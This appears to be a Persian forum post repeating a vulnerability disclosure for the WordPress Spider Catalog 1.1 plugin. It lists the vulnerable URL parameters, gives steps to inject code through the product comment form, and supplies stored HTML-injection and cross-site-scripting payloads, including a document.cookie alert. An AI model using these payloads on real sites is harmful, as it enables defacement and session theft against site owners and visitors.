Wordpress Spider Catalog 1.1 HTML Code Injection and Cross-Site scripting

جمع کردن
X
 
  • زمان
  • نمایش
پاک کردن همه
پست‌های جدید
  • Ali_Sedaghat
    عضو فعال
    • Oct 2012
    • 45

    #1

    Wordpress Spider Catalog 1.1 HTML Code Injection and Cross-Site scripting

    [align=LEFT]Wordpress Spider Catalog 1.1 HTML Code Injection and Cross-Site scripting
    [/align][align=LEFT]
    [php]http://www.web-dorado.com/products/wordpress-catalog.html[/php]

    Vulnerable Parameter Name:

    [php] ?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id}[/php]

    The error occurs when sending product reviews "view=showproduct" allowing the attacker
    to send code to your liking, not $_POST validate the form this code is stored in the db.

    Exploit 1:
    HTML Code Injection
    1. Select any of the products, click and give details or more
    2. Once done this post your code on the form with title "Add your comment here".

    An example of html:

    [php]<center><marquee><h1>HTML code Injection Tested</h1></marquee></center>[/php]

    [php] http://example.com/?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id}[/php]

    Exploit 2:
    Cross-site scripting
    1. Select any of the products, click and give details or more
    2. Once done this post your code on the form with title "Add your comment here".

    An example of possible xss:
    [php] <script>alert(document.cookie)</script>
    <script>alert("Xss ")</script>[/php]

    [php]
    http://example.com/?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id}
    [/php]

    [/align][align=LEFT] [/align]
در حال کار...